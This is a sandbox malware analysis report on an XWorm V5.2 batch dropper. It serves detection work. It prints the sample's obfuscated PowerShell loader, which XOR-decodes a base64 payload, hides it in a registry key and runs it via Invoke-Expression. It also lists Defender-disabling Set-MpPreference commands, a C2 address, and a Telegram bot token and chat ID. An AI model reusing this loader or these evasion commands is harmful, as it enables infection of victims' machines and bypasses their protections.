Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
georgefloyd.bat

Overview

General Information

Sample name:georgefloyd.bat
Analysis ID:1631918
MD5:c827b11ddab8f04af88ad75cf10ce5c3
SHA1:8ccd314ee72a96772cc6040e9c626332a18ff2d0
SHA256:e3f141aeea820a23216db5919e80573b1e5675e98a3c02a67d2e7b576ef269b5
Tags:batcf-prod-cap--cfduser-JAMESWT_MHT
Infos:

Detection

XWorm
Score:100
Range:0 - 100
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
C2 URLs / IPs found in malware configuration
Contains functionality to log keystrokes (.Net Source)
Encrypted powershell cmdline option found
Found large BAT file
Joe Sandbox ML detected suspicious sample
Performs an instant shutdown (NtRaiseHardError)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Uses the Telegram API (likely for C&C communication)
Yara detected Costura Assembly Loader
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Suspicious Execution of Powershell with Base64
Stores large binary data to the registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • cmd.exe (PID: 2780 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\georgefloyd.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 5540 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 332 cmdline: powershell -windowstyle hidden -c "Write-Host ('dedaoL rotcartxE llehsrewoP'[-1..-27] -join '');$path = $env:tMHryVWCxy;$path = $path.Trim();try {$_1 = Get-Content -Path $path.Substring(1, $path.Length - 2) -ErrorAction Stop;} catch {$_1 = Get-Content -Path $path}$_3 = $_1 -split '\n';$_2 = $_3[-1];$_2 = [Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($_2.Replace('\n', ''));$_4 = New-Object byte[] $_2.Length;for ($_5 = 0; $_5 -lt $_4.Length; $_5++) {$_4[$_5] = $_2[$_5] -bxor 0x20;};$_4 = [System.Text.Encoding]::Unicode.GetString($_4);Set-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows Search' -Name '$phantom-frZZfx' -Value $_4;Remove-Item -Path $path -Force;$_4 | Invoke-Expression" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6900 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • powershell.exe (PID: 7632 cmdline: powershell.exe -windowstyle hidden -ec aQBOAFYAbwBLAGUALQBlAFgAcABSAGUAUwBzAEkAbwBuACAAKAAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAnAEgASwBDAFUAOgBcAFMAbwBmAHQAdwBhAHIAZQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAFMAZQBhAHIAYwBoACcAIAAtAE4AYQBtAGUAIAAnACQAcABoAGEAbgB0AG8AbQAtAGYAcgBaAFoAZgB4ACcAKQAgAHwAIABTAGUAbABlAGMAdAAtAE8AYgBqAGUAYwB0ACAALQBFAHgAcABhAG4AZABQAHIAbwBwAGUAcgB0AHkAIABgACQAcABoAGEAbgB0AG8AbQAtAGYAcgBaAFoAZgB4ACkA MD5: 04029E121A0CFA5991749937DD22A1D9)
  • cleanup
{"C2 url": ["193.32.177.63"], "Port": 6000, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Telegram Token": "7238632531:AAGCQZAh03hAwOcuP9HUeoAP5AQV0o0tp24", "Telegram Chatid": "8080837794", "Version": "XWorm V5.2"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_XWorm_1Yara detected XWormJoe Security
    SourceRuleDescriptionAuthorStrings
    00000003.00000002.2338047448.00000243022FB000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
      0000000B.00000002.1553871152.0000022819A6F000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
        00000003.00000002.2718136098.0000024311715000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
          00000003.00000002.2338047448.00000243022CB000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
            0000000B.00000002.1553871152.0000022819B39000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
              Click to see the 9 entries
              SourceRuleDescriptionAuthorStrings
              3.2.powershell.exe.24302f3c610.0.unpackINDICATOR_SUSPICIOUS_DisableWinDefenderDetects executables containing artifcats associated with disabling Widnows DefenderditekSHen
              • 0x2a11:$reg1: SOFTWARE\Microsoft\Windows Defender\Features
              • 0x2a91:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender
              • 0x2b16:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender
              • 0x4c9a:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender
              • 0x4d59:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender
              • 0x4dd9:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender
              • 0x4fa1:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender
              • 0x2faf:$s1: Set-MpPreference -SignatureDisableUpdateOnStartupWithoutuser $true
              • 0x3067:$s2: Set-MpPreference -DisableArchiveScanning $true
              • 0x3107:$s3: Set-MpPreference -DisableIntrusionPreventionSystem $true
              • 0x31a5:$s4: Set-MpPreference -DisableScriptScanning $true
              • 0x322f:$s5: Set-MpPreference -SubmitSamplesConsent 2
              • 0x329d:$s6: Set-MpPreference -MAPSReporting 0
              • 0x3315:$s7: Set-MpPreference -HighThreatDefaultAction 6
              • 0x33b3:$s8: Set-MpPreference -ModerateThreatDefaultAction 6
              • 0x3441:$s9: Set-MpPreference -LowThreatDefaultAction 6
              • 0x34cb:$s10: Set-MpPreference -SevereThreatDefaultAction 6
              • 0x3622:$e2: Add-MpPreference -ExclusionPath
              3.2.powershell.exe.24302f46890.1.unpackINDICATOR_SUSPICIOUS_DisableWinDefenderDetects executables containing artifcats associated with disabling Widnows DefenderditekSHen
              • 0x2a11:$reg1: SOFTWARE\Microsoft\Windows Defender\Features
              • 0x2a91:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender
              • 0x2b16:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender
              • 0x4c9a:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender
              • 0x4d59:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender
              • 0x4dd9:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender
              • 0x4fa1:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender
              • 0x2faf:$s1: Set-MpPreference -SignatureDisableUpdateOnStartupWithoutuser $true
              • 0x3067:$s2: Set-MpPreference -DisableArchiveScanning $true
              • 0x3107:$s3: Set-MpPreference -DisableIntrusionPreventionSystem $true
              • 0x31a5:$s4: Set-MpPreference -DisableScriptScanning $true
              • 0x322f:$s5: Set-MpPreference -SubmitSamplesConsent 2
              • 0x329d:$s6: Set-MpPreference -MAPSReporting 0
              • 0x3315:$s7: Set-MpPreference -HighThreatDefaultAction 6
              • 0x33b3:$s8: Set-MpPreference -ModerateThreatDefaultAction 6
              • 0x3441:$s9: Set-MpPreference -LowThreatDefaultAction 6
              • 0x34cb:$s10: Set-MpPreference -SevereThreatDefaultAction 6
              • 0x3622:$e2: Add-MpPreference -ExclusionPath
              11.2.powershell.exe.22819b56788.6.raw.unpackJoeSecurity_XWormYara detected XWormJoe Security
                11.2.powershell.exe.22819b56788.6.raw.unpackrat_win_xworm_v3Finds XWorm (version XClient, v3) samples based on characteristic stringsSekoia.io
                • 0x6718:$str01: $VB$Local_Port
                • 0x6709:$str02: $VB$Local_Host
                • 0x6994:$str03: get_Jpeg
                • 0x63f4:$str04: get_ServicePack
                • 0x75b3:$str05: Select * from AntivirusProduct
                • 0x77b1:$str06: PCRestart
                • 0x77c5:$str07: shutdown.exe /f /r /t 0
                • 0x7877:$str08: StopReport
                • 0x784d:$str09: StopDDos
                • 0x794f:$str10: sendPlugin
                • 0x7afb:$str12: -ExecutionPolicy Bypass -File "
                • 0x7c24:$str13: Content-length: 5235
                11.2.powershell.exe.22819b56788.6.raw.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
                • 0x7e91:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                • 0xdf64:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                • 0x7f2e:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                • 0xe01c:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                • 0x8043:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                • 0xe14c:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                • 0x7b3f:$cnc4: POST / HTTP/1.1
                Click to see the 19 entries
                SourceRuleDescriptionAuthorStrings
                amsi64_332.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
                • 0xea3d:$b2: ::FromBase64String(
                • 0x91:$s1: -join
                • 0x196:$s1: -join
                • 0xbb26:$s1: -join
                • 0x52d2:$s4: +=
                • 0x5394:$s4: +=
                • 0x95bb:$s4: +=
                • 0xb6d8:$s4: +=
                • 0xb9c2:$s4: +=
                • 0xbb08:$s4: +=
                • 0xdd20:$s4: +=
                • 0xdda0:$s4: +=
                • 0xde66:$s4: +=
                • 0xdee6:$s4: +=
                • 0xe0bc:$s4: +=
                • 0xe140:$s4: +=
                • 0xc209:$e4: Get-WmiObject
                • 0xc3f8:$e4: Get-Process
                • 0xc450:$e4: Start-Process

                System Summary

                barindex
                Source: Process startedAuthor: Thomas Patzke: Data: Command: powershell -windowstyle hidden -c "Write-Host ('dedaoL rotcartxE llehsrewoP'[-1..-27] -join '');$path = $env:tMHryVWCxy;$path = $path.Trim();try {$_1 = Get-Content -Path $path.Substring(1, $path.Length - 2) -ErrorAction Stop;} catch {$_1 = Get-Content -Path $path}$_3 = $_1 -split '\n';$_2 = $_3[-1];$_2 = [Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($_2.Replace('\n', ''));$_4 = New-Object byte[] $_2.Length;for ($_5 = 0; $_5 -lt $_4.Length; $_5++) {$_4[$_5] = $_2[$_5] -bxor 0x20;};$_4 = [System.Text.Encoding]::Unicode.GetString($_4);Set-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows Search' -Name '$phantom-frZZfx' -Value $_4;Remove-Item -Path $path -Force;$_4 | Invoke-Expression", CommandLine: powershell -windowstyle hidden -c "Write-Host ('dedaoL rotcartxE llehsrewoP'[-1..-27] -join '');$path = $env:tMHryVWCxy;$path = $path.Trim();try {$_1 = Get-Content -Path $path.Substring(1, $path.Length - 2) -ErrorAction Stop;} catch {$_1 = Get-Content -Path $path}$_3 = $_1 -split '\n';$_2 = $_3[-1];$_2 = [Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($_2.Replace('\n', ''));$_4 = New-Object byte[] $_2.Length;for ($_5 = 0; $_5 -lt $_4.Length; $_5++) {$_4[$_5] = $_2[$_5] -bxor 0x20;};$_4 = [System.Text.Encoding]::Unicode.GetString($_4);Set-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows Search' -Name '$phantom-frZZfx' -Value $_4;Remove-Item -Path $path -Force;$_4 | Invoke-Expression", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\georgefloyd.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2780, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -windowstyle hidden -c "Write-Host ('dedaoL rotcartxE llehsrewoP'[-1..-27] -join '');$path = $env:tMHryVWCxy;$path = $path.Trim();try {$_1 = Get-Content -Path $path.Substring(1, $path.Length - 2) -ErrorAction Stop;} catch {$_1 = Get-Content -Path $path}$_3 = $_1 -split '\n';$_2 = $_3[-1];$_2 = [Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($_2.Replace('\n', ''));$_4 = New-Object byte[] $_2.Length;for ($_5 = 0; $_5 -lt $_4.Length; $_5++) {$_4[$_5] = $_2[$_5] -bxor 0x20;};$_4 = [System.Text.Encoding]::Unicode.GetString($_4);Set-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows Search' -Name '$phantom-frZZfx' -Value $_4;Remove-Item -Path $path -Force;$_4 | Invoke-Expression", ProcessId: 332, ProcessName: powershell.exe
                Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: powershell -windowstyle hidden -c "Write-Host ('dedaoL rotcartxE llehsrewoP'[-1..-27] -join '');$path = $env:tMHryVWCxy;$path = $path.Trim();try {$_1 = Get-Content -Path $path.Substring(1, $path.Length - 2) -ErrorAction Stop;} catch {$_1 = Get-Content -Path $path}$_3 = $_1 -split '\n';$_2 = $_3[-1];$_2 = [Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($_2.Replace('\n', ''));$_4 = New-Object byte[] $_2.Length;for ($_5 = 0; $_5 -lt $_4.Length; $_5++) {$_4[$_5] = $_2[$_5] -bxor 0x20;};$_4 = [System.Text.Encoding]::Unicode.GetString($_4);Set-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows Search' -Name '$phantom-frZZfx' -Value $_4;Remove-Item -Path $path -Force;$_4 | Invoke-Expression", CommandLine: powershell -windowstyle hidden -c "Write-Host ('dedaoL rotcartxE llehsrewoP'[-1..-27] -join '');$path = $env:tMHryVWCxy;$path = $path.Trim();try {$_1 = Get-Content -Path $path.Substring(1, $path.Length - 2) -ErrorAction Stop;} catch {$_1 = Get-Content -Path $path}$_3 = $_1 -split '\n';$_2 = $_3[-1];$_2 = [Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($_2.Replace('\n', ''));$_4 = New-Object byte[] $_2.Length;for ($_5 = 0; $_5 -lt $_4.Length; $_5++) {$_4[$_5] = $_2[$_5] -bxor 0x20;};$_4 = [System.Text.Encoding]::Unicode.GetString($_4);Set-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows Search' -Name '$phantom-frZZfx' -Value $_4;Remove-Item -Path $path -Force;$_4 | Invoke-Expression", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\georgefloyd.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2780, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -windowstyle hidden -c "Write-Host ('dedaoL rotcartxE llehsrewoP'[-1..-27] -join '');$path = $env:tMHryVWCxy;$path = $path.Trim();try {$_1 = Get-Content -Path $path.Substring(1, $path.Length - 2) -ErrorAction Stop;} catch {$_1 = Get-Content -Path $path}$_3 = $_1 -split '\n';$_2 = $_3[-1];$_2 = [Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($_2.Replace('\n', ''));$_4 = New-Object byte[] $_2.Length;for ($_5 = 0; $_5 -lt $_4.Length; $_5++) {$_4[$_5] = $_2[$_5] -bxor 0x20;};$_4 = [System.Text.Encoding]::Unicode.GetString($_4);Set-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows Search' -Name '$phantom-frZZfx' -Value $_4;Remove-Item -Path $path -Force;$_4 | Invoke-Expression", ProcessId: 332, ProcessName: powershell.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: powershell.exe -windowstyle hidden -ec aQBOAFYAbwBLAGUALQBlAFgAcABSAGUAUwBzAEkAbwBuACAAKAAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAnAEgASwBDAFUAOgBcAFMAbwBmAHQAdwBhAHIAZQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAFMAZQBhAHIAYwBoACcAIAAtAE4AYQBtAGUAIAAnACQAcABoAGEAbgB0AG8AbQAtAGYAcgBaAFoAZgB4ACcAKQAgAHwAIABTAGUAbABlAGMAdAAtAE8AYgBqAGUAYwB0ACAALQBFAHgAcABhAG4AZABQAHIAbwBwAGUAcgB0AHkAIABgACQAcABoAGEAbgB0AG8AbQAtAGYAcgBaAFoAZgB4ACkA, CommandLine: powershell.exe -windowstyle hidden -ec aQBOAFYAbwBLAGUALQBlAFgAcABSAGUAUwBzAEkAbwBuACAAKAAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAnAEgASwBDAFUAOgBcAFMAbwBmAHQAdwBhAHIAZQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAFMAZQBhAHIAYwBoACcAIAAtAE4AYQBtAGUAIAAnACQAcABoAGEAbgB0AG8AbQAtAGYAcgBaAFoAZgB4ACcAKQAgAHwAIABTAGUAbABlAGMAdAAtAE8AYgBqAGUAYwB0ACAALQBFAHgAcABhAG4AZABQAHIAbwBwAGUAcgB0AHkAIABgACQAcABoAGEAbgB0AG8AbQAtAGYAcgBaAFoAZgB4ACkA, CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 7612, ProcessCommandLine: powershell.exe -windowstyle hidden -ec aQBOAFYAbwBLAGUALQBlAFgAcABSAGUAUwBzAEkAbwBuACAAKAAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAnAEgASwBDAFUAOgBcAFMAbwBmAHQAdwBhAHIAZQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAFMAZQBhAHIAYwBoACcAIAAtAE4AYQBtAGUAIAAnACQAcABoAGEAbgB0AG8AbQAtAGYAcgBaAFoAZgB4ACcAKQAgAHwAIABTAGUAbABlAGMAdAAtAE8AYgBqAGUAYwB0ACAALQBFAHgAcABhAG4AZABQAHIAbwBwAGUAcgB0AHkAIABgACQAcABoAGEAbgB0AG8AbQAtAGYAcgBaAFoAZgB4ACkA, ProcessId: 7632, ProcessName: powershell.exe
                Source: Process startedAuthor: frack113: Data: Command: powershell.exe -windowstyle hidden -ec aQBOAFYAbwBLAGUALQBlAFgAcABSAGUAUwBzAEkAbwBuACAAKAAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAnAEgASwBDAFUAOgBcAFMAbwBmAHQAdwBhAHIAZQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAFMAZQBhAHIAYwBoACcAIAAtAE4AYQBtAGUAIAAnACQAcABoAGEAbgB0AG8AbQAtAGYAcgBaAFoAZgB4ACcAKQAgAHwAIABTAGUAbABlAGMAdAAtAE8AYgBqAGUAYwB0ACAALQBFAHgAcABhAG4AZABQAHIAbwBwAGUAcgB0AHkAIABgACQAcABoAGEAbgB0AG8AbQAtAGYAcgBaAFoAZgB4ACkA, CommandLine: powershell.exe -windowstyle hidden -ec aQBOAFYAbwBLAGUALQBlAFgAcABSAGUAUwBzAEkAbwBuACAAKAAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAnAEgASwBDAFUAOgBcAFMAbwBmAHQAdwBhAHIAZQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAFMAZQBhAHIAYwBoACcAIAAtAE4AYQBtAGUAIAAnACQAcABoAGEAbgB0AG8AbQAtAGYAcgBaAFoAZgB4ACcAKQAgAHwAIABTAGUAbABlAGMAdAAtAE8AYgBqAGUAYwB0ACAALQBFAHgAcABhAG4AZABQAHIAbwBwAGUAcgB0AHkAIABgACQAcABoAGEAbgB0AG8AbQAtAGYAcgBaAFoAZgB4ACkA, CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 7612, ProcessCommandLine: powershell.exe -windowstyle hidden -ec aQBOAFYAbwBLAGUALQBlAFgAcABSAGUAUwBzAEkAbwBuACAAKAAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAnAEgASwBDAFUAOgBcAFMAbwBmAHQAdwBhAHIAZQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAFMAZQBhAHIAYwBoACcAIAAtAE4AYQBtAGUAIAAnACQAcABoAGEAbgB0AG8AbQAtAGYAcgBaAFoAZgB4ACcAKQAgAHwAIABTAGUAbABlAGMAdAAtAE8AYgBqAGUAYwB0ACAALQBFAHgAcABhAG4AZABQAHIAbwBwAGUAcgB0AHkAIABgACQAcABoAGEAbgB0AG8AbQAtAGYAcgBaAFoAZgB4ACkA, ProcessId: 7632, ProcessName: powershell.exe
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -windowstyle hidden -c "Write-Host ('dedaoL rotcartxE llehsrewoP'[-1..-27] -join '');$path = $env:tMHryVWCxy;$path = $path.Trim();try {$_1 = Get-Content -Path $path.Substring(1, $path.Length - 2) -ErrorAction Stop;} catch {$_1 = Get-Content -Path $path}$_3 = $_1 -split '\n';$_2 = $_3[-1];$_2 = [Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($_2.Replace('\n', ''));$_4 = New-Object byte[] $_2.Length;for ($_5 = 0; $_5 -lt $_4.Length; $_5++) {$_4[$_5] = $_2[$_5] -bxor 0x20;};$_4 = [System.Text.Encoding]::Unicode.GetString($_4);Set-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows Search' -Name '$phantom-frZZfx' -Value $_4;Remove-Item -Path $path -Force;$_4 | Invoke-Expression", CommandLine: powershell -windowstyle hidden -c "Write-Host ('dedaoL rotcartxE llehsrewoP'[-1..-27] -join '');$path = $env:tMHryVWCxy;$path = $path.Trim();try {$_1 = Get-Content -Path $path.Substring(1, $path.Length - 2) -ErrorAction Stop;} catch {$_1 = Get-Content -Path $path}$_3 = $_1 -split '\n';$_2 = $_3[-1];$_2 = [Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($_2.Replace('\n', ''));$_4 = New-Object byte[] $_2.Length;for ($_5 = 0; $_5 -lt $_4.Length; $_5++) {$_4[$_5] = $_2[$_5] -bxor 0x20;};$_4 = [System.Text.Encoding]::Unicode.GetString($_4);Set-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows Search' -Name '$phantom-frZZfx' -Value $_4;Remove-Item -Path $path -Force;$_4 | Invoke-Expression", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\georgefloyd.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2780, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -windowstyle hidden -c "Write-Host ('dedaoL rotcartxE llehsrewoP'[-1..-27] -join '');$path = $env:tMHryVWCxy;$path = $path.Trim();try {$_1 = Get-Content -Path $path.Substring(1, $path.Length - 2) -ErrorAction Stop;} catch {$_1 = Get-Content -Path $path}$_3 = $_1 -split '\n';$_2 = $_3[-1];$_2 = [Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($_2.Replace('\n', ''));$_4 = New-Object byte[] $_2.Length;for ($_5 = 0; $_5 -lt $_4.Length; $_5++) {$_4[$_5] = $_2[$_5] -bxor 0x20;};$_4 = [System.Text.Encoding]::Unicode.GetString($_4);Set-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows Search' -Name '$phantom-frZZfx' -Value $_4;Remove-Item -Path $path -Force;$_4 | Invoke-Expression", ProcessId: 332, ProcessName: powershell.exe
                Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: powershell -windowstyle hidden -c "Write-Host ('dedaoL rotcartxE llehsrewoP'[-1..-27] -join '');$path = $env:tMHryVWCxy;$path = $path.Trim();try {$_1 = Get-Content -Path $path.Substring(1, $path.Length - 2) -ErrorAction Stop;} catch {$_1 = Get-Content -Path $path}$_3 = $_1 -split '\n';$_2 = $_3[-1];$_2 = [Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($_2.Replace('\n', ''));$_4 = New-Object byte[] $_2.Length;for ($_5 = 0; $_5 -lt $_4.Length; $_5++) {$_4[$_5] = $_2[$_5] -bxor 0x20;};$_4 = [System.Text.Encoding]::Unicode.GetString($_4);Set-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows Search' -Name '$phantom-frZZfx' -Value $_4;Remove-Item -Path $path -Force;$_4 | Invoke-Expression", CommandLine: powershell -windowstyle hidden -c "Write-Host ('dedaoL rotcartxE llehsrewoP'[-1..-27] -join '');$path = $env:tMHryVWCxy;$path = $path.Trim();try {$_1 = Get-Content -Path $path.Substring(1, $path.Length - 2) -ErrorAction Stop;} catch {$_1 = Get-Content -Path $path}$_3 = $_1 -split '\n';$_2 = $_3[-1];$_2 = [Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($_2.Replace('\n', ''));$_4 = New-Object byte[] $_2.Length;for ($_5 = 0; $_5 -lt $_4.Length; $_5++) {$_4[$_5] = $_2[$_5] -bxor 0x20;};$_4 = [System.Text.Encoding]::Unicode.GetString($_4);Set-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows Search' -Name '$phantom-frZZfx' -Value $_4;Remove-Item -Path $path -Force;$_4 | Invoke-Expression", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\georgefloyd.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2780, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -windowstyle hidden -c "Write-Host ('dedaoL rotcartxE llehsrewoP'[-1..-27] -join '');$path = $env:tMHryVWCxy;$path = $path.Trim();try {$_1 = Get-Content -Path $path.Substring(1, $path.Length - 2) -ErrorAction Stop;} catch {$_1 = Get-Content -Path $path}$_3 = $_1 -split '\n';$_2 = $_3[-1];$_2 = [Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($_2.Replace('\n', ''));$_4 = New-Object byte[] $_2.Length;for ($_5 = 0; $_5 -lt $_4.Length; $_5++) {$_4[$_5] = $_2[$_5] -bxor 0x20;};$_4 = [System.Text.Encoding]::Unicode.GetString($_4);Set-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows Search' -Name '$phantom-frZZfx' -Value 